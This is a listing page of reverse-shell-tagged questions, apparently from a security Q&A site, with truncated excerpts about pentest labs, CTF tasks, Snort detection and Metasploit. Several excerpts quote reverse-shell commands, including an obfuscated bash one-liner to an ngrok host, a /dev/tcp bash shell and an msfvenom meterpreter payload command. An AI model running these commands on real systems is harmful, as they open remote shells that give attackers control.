Questions tagged [reverse-shell]
The reverse-shell tag has no summary.
64 questions
1
vote
1
answer
207
views
What is the proper way of starting an HTTP-only reverse shell using Chisel?
My lab has these restrictions:
1. Inbound and Outbound HTTP connections are allowed from CONFLUENCE01.
2. For Non-HTTP connections, only inbound TCP is allowed at port 8090 of CONFLUENCE01.
3. ...
- 21
1
vote
1
answer
205
views
How did I manage to reverse shell my own machine?
Beginner pentester here.
I'm testing a bug bounty website and found a potential SSRF by url injection trying to fetch for another server in the PSF, which leads the server's backend to send several ...
1
vote
0
answers
267
views
could XXE vulnerability lead to an RCE
I have identified an XXE vulnerability in an XML parser of an application that allows external entities.
I used the below crafted xml to do a get request on localhost on port 9090, and on the same ...
- 559
1
vote
1
answer
135
views
How can I prevent msfvenom Python payloads from forking without manually decoding the payload?
I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
- 21
2
votes
0
answers
165
views
Getting reverse shell as another user
I'm performing Overpass the hash attack @ TryHackMe > CompTIA Pentest+ > Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let's Get to Work!
I dumped Key of my target ...
- 85
0
votes
0
answers
372
views
Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?
I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?...
- 129
0
votes
1
answer
171
views
Reverse Shell payload does not work
$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27')
-i: -c: line 1: unexpected EOF while looking for matching `''
I was trying to get a ...
1
vote
0
answers
550
views
Create and bind to Metasploit reverse shell on Apple Sillicon system
I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
- 81
0
votes
1
answer
301
views
Snort rule doesn't match the content in Meterpreter session packet
I'm working on a university project and I'm trying to identify a reverse shell attack with Snort IDS.
For the attack I used Meterpreter/reverse_tcp and analyzed the packets via Wireshark for traces to ...
0
votes
0
answers
1k
views
Bash reverse shell as a URL parameter value
I try to put bash reverse shell as a URL parameter. The command is as follows:
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
I have encoded the above code with URL encoding
bash%20-i%20%...
- 1
0
votes
1
answer
242
views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
- 3
0
votes
0
answers
397
views
Running code on attacker machine from a reverse ssh exploit? (Low level theoretical explanation required)
Reverse shell. A victim server runs a malicious binary which creates an SSH connection to the attacker machine. Then the attacker machine SSH's to the victim server and runs commands (that way you ...
- 111
0
votes
0
answers
305
views
Is it possible to disable screenshare if someone's got meterpreter shell on your PC?
If hypothetically there was a meterpreter shell installed on your pc, are there security features or ways to harden a Windows laptop to prevent the hacker from using the screen share command to spy on ...
- 1
0
votes
1
answer
434
views
If a reverse shell target is an administrator does the attacker have admin?
If a reverse shell target is an administrator does the attacker have admin?
I've been trying to find the answer to this but can only find general information on how they connect to a target and not ...
1
vote
0
answers
1k
views
Reverse shell not working [closed]
I'm running a DVWA container on my kali VM using:
docker run --rm -it -p 80:80 vulnerables/web-dvwa
Network interface details:
Kali docker0 int: 172.17.0.1/16
Kali eth0 int: 192.168.1.233/24
DVWA ...
user281325